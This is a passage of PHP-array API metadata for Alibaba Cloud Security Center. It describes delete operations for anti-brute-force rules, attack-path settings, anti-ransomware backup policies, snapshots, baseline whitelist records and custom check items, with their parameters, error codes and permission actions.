'required' => true, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => 'FBBEB173-1F43-505F-A876-C03ECDF6CE4C', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Delete an anti-brute-force rule', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteAntiBruteForceRule'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteAntiBruteForceRule', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'AntiBruteForceRule', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:antibruteforcerule/{#AntiBruteForceRuleId}'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"FBBEB173-1F43-505F-A876-C03ECDF6CE4C\\"\\n}","type":"json"}]', ], 'DeleteAttackPathSensitiveAssetConfig' => [ 'summary' => 'Delete attack path sensitive asset.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'delete', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '226508', 'abilityTreeNodes' => ['FEATUREsasAIJXMJ'], ], 'parameters' => [ [ 'name' => 'AttackPathSensitiveAssetConfigId', 'in' => 'query', 'schema' => ['description' => 'ID of the attack path sensitive asset configuration.', 'type' => 'string', 'required' => true, 'example' => 'apsac-123', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.', 'type' => 'string', 'example' => 'D65AADFC-1D20-5A6A-8F6A-9FA53C0D****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'DataNotExists', 'errorMessage' => 'data not exist', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"D65AADFC-1D20-5A6A-8F6A-9FA53C0D****\\"\\n}","type":"json"}]', 'title' => 'DeleteAttackPathSensitiveAssetConfig', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteAttackPathSensitiveAssetConfig', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'AttackPathSensitiveAssetConfig', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:attackpathsensitiveassetconfig/{#attackpathsensitiveassetconfigId}'], ], ], ], ], 'translator' => 'machine', ], 'DeleteAttackPathWhitelist' => [ 'summary' => 'Deletes an attack path whitelist entry.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'delete', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '226531', 'abilityTreeNodes' => ['FEATUREsasAIJXMJ'], ], 'parameters' => [ [ 'name' => 'AttackPathWhitelistId', 'in' => 'query', 'schema' => ['description' => 'The ID of the attack path whitelist entry.'."\n" .'> You can call [ListAttackPathWhitelist](~~ListAttackPathWhitelist~~) to query attack path whitelist IDs.', 'type' => 'string', 'required' => true, 'example' => 'apwl-b33dec0acf9b42aabde032d656c0****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '898F7AA7-CECD-5EC7-AF4D-664C601B****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'DataNotExists', 'errorMessage' => 'data not exist', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'title' => 'Delete an attack path whitelist entry', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteAttackPathWhitelist', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'AttackPathWhitelist', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:attackpathwhitelist/{#attackpathwhitelistId}'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"898F7AA7-CECD-5EC7-AF4D-664C601B****\\"\\n}","type":"json"}]', ], 'DeleteAttestor' => [ 'summary' => 'Deletes an attestor.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'delete', 'abilityTreeCode' => '91945', 'abilityTreeNodes' => ['FEATUREsasJEFOWE'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '221.214.XXX.XX', 'title' => ''], ], [ 'name' => 'Name', 'in' => 'query', 'schema' => ['description' => 'The name of the attestor.', 'type' => 'string', 'required' => false, 'example' => 'attestor', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request.', 'type' => 'string', 'example' => 'CD380235-A0B8-540D-A0D5-D6288446****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Delete an attestor', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteAttestor'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteAttestor', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"CD380235-A0B8-540D-A0D5-D6288446****\\"\\n}","type":"json"}]', ], 'DeleteAutoTagRules' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'delete', 'abilityTreeCode' => '91946', 'abilityTreeNodes' => ['FEATUREsas36IOGX'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'RuleIdList', 'in' => 'query', 'schema' => ['description' => 'The IDs of the rules. Separate multiple IDs with commas (,).'."\n" .'> Call the [ListAutoTagRules](~~ListAutoTagRules~~) operation to obtain this parameter.', 'type' => 'string', 'required' => true, 'example' => '2331,56,5644', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => 'CD380235-A0B8-540D-A0D5-D6288446****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Delete an automatic asset tagging rule', 'summary' => 'Deletes an automatic asset tagging rule. This operation is used with the system configuration, feature settings, multi-cloud configuration management, and asset management rule features of Security Center.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteAutoTagRules'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteAutoTagRules', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"CD380235-A0B8-540D-A0D5-D6288446****\\"\\n}","type":"json"}]', ], 'DeleteBackupPolicy' => [ 'summary' => 'Deletes ransomware mitigation policies.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'delete', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas7JO011'], ], 'parameters' => [ [ 'name' => 'Id', 'in' => 'query', 'schema' => ['description' => 'The ID of the mitigation policies that you want to delete.'."\n" .'>Invoke the [DescribeBackupPolicies](~~DescribeBackupPolicies~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '12', 'title' => ''], ], [ 'name' => 'PolicyVersion', 'in' => 'query', 'schema' => ['description' => 'The version of the mitigation policies that you want to delete. You can invoke the [DescribeBackupPolicies](~~DescribeBackupPolicies~~) operation to query this parameter. Valid values:'."\n" ."\n" .'- **1.0.0**: The mitigation policies version is 1.0.0.'."\n" .'- **2.0.0**: The mitigation policies version is 2.0.0.', 'type' => 'string', 'required' => false, 'example' => '2.0.0', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '24A20733-10A0-4AF6-BE6B-E3322413BB68', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Delete ransomware mitigation policies', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteBackupPolicy'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteBackupPolicy', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'BackupPolicy', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:backuppolicy/{#BackupPolicyId}'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"24A20733-10A0-4AF6-BE6B-E3322413BB68\\"\\n}","type":"json"}]', ], 'DeleteBackupPolicyMachine' => [ 'summary' => 'Deletes a server from a specified anti-ransomware policy.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'delete', 'abilityTreeCode' => '91948', 'abilityTreeNodes' => ['FEATUREsas7JO011'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server to which the anti-ransomware policy is applied.'."\n" ."\n" .'> You must specify at least one of the `UuidList` and `Uuid` parameters.'."\n", 'type' => 'string', 'required' => false, 'example' => '083036e9-8411-4a9d-83af-9acbd****', 'title' => ''], ], [ 'name' => 'PolicyId', 'in' => 'query', 'schema' => ['description' => 'The ID of the anti-ransomware policy.'."\n" ."\n" .'> You can call the [DescribeBackupPolicies](~~DescribeBackupPolicies~~) operation to query the IDs of anti-ransomware policies.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '11', 'title' => ''], ], [ 'name' => 'PolicyVersion', 'in' => 'query', 'schema' => ['description' => 'The version of the anti-ransomware policy. Valid values:'."\n" ."\n" .'* **1.0.0**'."\n" .'* **2.0.0**'."\n" ."\n" .'> You can call the [DescribeBackupPolicies](~~DescribeBackupPolicies~~) operation to query the versions of anti-ransomware policies.', 'type' => 'string', 'required' => true, 'example' => '2.0.0', 'title' => ''], ], [ 'name' => 'UuidList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The UUIDs of the servers to which the anti-ransomware policy is applied.'."\n" ."\n" .'> You must specify at least one of the `UuidList` and `Uuid` parameters.'."\n", 'type' => 'array', 'items' => ['description' => 'The UUID of the server to which the anti-ransomware policy is applied.'."\n" ."\n" .'> You must specify at least one of the `UuidList` and `Uuid` parameters.'."\n", 'type' => 'string', 'required' => false, 'example' => '083036e9-8411-4a9d-83af-9acbd****', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'D0D6E6E4-CB8C-4897-B852-46AEFDA04B21', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'DeleteBackupPolicyMachine', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteBackupPolicyMachine'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteBackupPolicyMachine', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"D0D6E6E4-CB8C-4897-B852-46AEFDA04B21\\"\\n}","type":"json"}]', ], 'DeleteBackupSnapshot' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'systemTags' => [ 'operationType' => 'delete', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '199568', 'abilityTreeNodes' => ['FEATUREsas7JO011'], ], 'parameters' => [ [ 'name' => 'RetainLatestSnapshot', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to retain the latest snapshot. Valid values:'."\n" .'- **true**: retains the latest snapshot.'."\n" .'- **false**: does not retain the latest snapshot.', 'type' => 'boolean', 'required' => false, 'example' => 'true', 'title' => ''], ], [ 'name' => 'BackupSnapshotList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The backup snapshots.', 'type' => 'array', 'items' => [ 'description' => 'The backup snapshot.', 'type' => 'object', 'properties' => [ 'SnapshotId' => ['description' => 'The ID of the snapshot to delete.'."\n" .'>You can call the [DescribeSnapshots](~~DescribeSnapshots~~) operation to obtain this parameter.', 'type' => 'string', 'required' => true, 'example' => 's-000f9p6r5trm6u4d****', 'title' => ''], 'ClientId' => ['description' => 'The ID of the backup client.'."\n" ."\n" .'> You can call the [DescribeSnapshots](~~DescribeSnapshots~~) operation to obtain this parameter.', 'type' => 'string', 'required' => true, 'example' => 'c-000a4h33w14ka8xa****', 'title' => ''], 'VaultId' => ['description' => 'The ID of the backup vault for the restoration task.'."\n" .'>You can call the [DescribeSnapshots](~~DescribeSnapshots~~) operation to obtain this parameter.', 'type' => 'string', 'required' => true, 'example' => 'v-0004vhwcs2pmacfz****', 'title' => ''], 'SourceType' => ['description' => 'The type of the data source. Valid values:'."\n" ."\n" .'- **ECS_FILE**: backup snapshot of ECS files.'."\n" .'- **OSS**: backup snapshot of Alibaba Cloud OSS.'."\n" .'- **NAS**: backup snapshot of Alibaba Cloud NAS.'."\n" .'- **OTS_TABLE**: backup snapshot of Alibaba Cloud Tablestore.', 'type' => 'string', 'required' => true, 'example' => 'ECS_FILE', 'title' => ''], 'InstanceId' => ['description' => 'The ID of the server instance.', 'type' => 'string', 'required' => true, 'example' => 'i-j6cj8vyajp1fo4at****', 'title' => ''], 'RegionId' => ['description' => 'The region of the Security Center instance. Valid values:'."\n" ."\n" .'- **cn-hangzhou**: China (Hangzhou).'."\n" .'- **ap-southeast-1**: Singapore.'."\n" .'- **cn-beijing**: China (Beijing).', 'type' => 'string', 'required' => true, 'example' => 'cn-beijing', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'maxItems' => 50, 'title' => '', 'example' => '', ], ], [ 'name' => 'BackupRegionIdList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The backup regions.', 'type' => 'array', 'items' => ['description' => 'The region.', 'type' => 'string', 'required' => false, 'example' => 'cn-hangzhou', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. It is a unique identifier generated by Alibaba Cloud for the request and can be used to troubleshoot issues.', 'type' => 'string', 'example' => '7BC55C8F-226E-5AF5-9A2C-2EC43864****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'CannotDeleteLatestSnapshot', 'errorMessage' => 'Can not delete latest snapshot.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'title' => 'Delete backup snapshots', 'summary' => 'Deletes snapshots of anti-ransomware backups in Security Center.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteBackupSnapshot'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteBackupSnapshot', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"7BC55C8F-226E-5AF5-9A2C-2EC43864****\\"\\n}","type":"json"}]', ], 'DeleteBaselineCheckWhiteRecord' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'deprecated' => false, 'systemTags' => [ 'operationType' => 'delete', 'abilityTreeCode' => '196444', 'abilityTreeNodes' => ['FEATUREsas0XJWFD'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'CheckIds', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The IDs of check items.'."\n", 'type' => 'array', 'items' => ['description' => 'The ID of the check item.'."\n" ."\n" .'> You can call the [DescribeCheckWarningSummary](~~116179~~) operation to query the IDs of check items.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '25', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'RecordIds', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The IDs of the whitelist records.'."\n", 'type' => 'array', 'items' => ['description' => 'The ID of the whitelist record.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '49639781', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'Source', 'in' => 'query', 'schema' => ['description' => 'The data source. Valid values:'."\n" ."\n" .'* **default**: host baseline'."\n" .'* **agentless**: agentless detection'."\n", 'type' => 'string', 'required' => false, 'example' => 'agentless', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => 'BaseResult', 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'E10BAF1C-A6C5-51E2-866C-76D5922E****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'DeleteBaselineCheckWhiteRecord', 'summary' => 'Deletes the whitelist record for a baseline check item.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteBaselineCheckWhiteRecord'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteBaselineCheckWhiteRecord', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"E10BAF1C-A6C5-51E2-866C-76D5922E****\\"\\n}","type":"json"}]', ], 'DeleteBinarySecurityPolicy' => [ 'summary' => 'Deletes a binary security policy from the container signature feature.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => ['operationType' => 'delete'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.'."\n", 'type' => 'string', 'required' => false, 'example' => '42.120.XXX.XXX', 'title' => ''], ], [ 'name' => 'Name', 'in' => 'query', 'schema' => ['description' => 'The name of the binary security policy.'."\n", 'type' => 'string', 'required' => false, 'example' => 'policy-auto-bfu7pm', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'A6CFADC0-1167-521A-9284-8CD8034C****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'DeleteBinarySecurityPolicy', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteBinarySecurityPolicy'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteBinarySecurityPolicy', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"A6CFADC0-1167-521A-9284-8CD8034C****\\"\\n}","type":"json"}]', ], 'DeleteCheckItem' => [ 'summary' => 'Deletes user-defined check items in the Cloud Security Posture Management (CSPM) custom check item feature.', 'path' => '', 'methods' => ['post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'delete', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], ], 'parameters' => [ [ 'name' => 'CheckIds', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of check item IDs.', 'type' => 'array', 'items' => ['description' => 'The check item ID.'."\n" .'> You can call the [ListCheckItems](~~ListCheckItems~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1000000000001', 'title' => ''], 'required' => true, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The response struct.', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'The request ID. Alibaba Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '20456DD5-5CBF-5015-9173-12CA4246B***'], 'CheckItems' => [ 'description' => 'The list of deleted custom check items.', 'type' => 'array', 'items' => [ 'description' => 'The check item information.', 'type' => 'object', 'properties' => [ 'CheckId' => ['description' => 'The check item ID.', 'type' => 'integer', 'format' => 'int64', 'example' => '1000000000001', 'title' => ''], 'CheckShowName' => ['description' => 'The check item name.', 'type' => 'string', 'example' => 'testCheckItemName', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'ParamIllegal.%s', 'errorMessage' => 'The parameter %s is invalid, please fill it in again.', 'description' => ''], ['errorCode' => 'CspmDeleteCheckCustomItemError', 'errorMessage' => 'The deleted custom check item does not exist.', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Delete custom check items', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteCheckItem'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteCheckItem', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'CustomCheckItem', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:customcheckitem/{#customcheckitemId}'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"20456DD5-5CBF-5015-9173-12CA4246B***\\",\\n \\"CheckItems\\": [\\n {\\n \\"CheckId\\": 1000000000001,\\n \\"CheckShowName\\": \\"testCheckItemName\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DeleteCheckPolicy' => [ 'summary' => 'Delete custom scope directories in Cloud Security Posture Management (CSPM) custom checks. You can remove assigned standards, requirements, or sections.', 'path' => '', 'methods' => ['post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'delete', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], ], 'parameters' => [ [ 'name' => 'PolicyIds', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'Array of policies to delete'."\n", 'type' => 'array', 'items' => ['description' => 'The ID of the deleted policy.'."\n" ."\n" .'> You can call the [ListCheckPolicies](~~ListCheckPolicies~~) to obtain the policy ID.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '100000000001', 'title' => ''], 'required' => true, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'PolicyType', 'in' => 'query', 'schema' => ['description' => 'Policy type for custom check rule:'."\n" 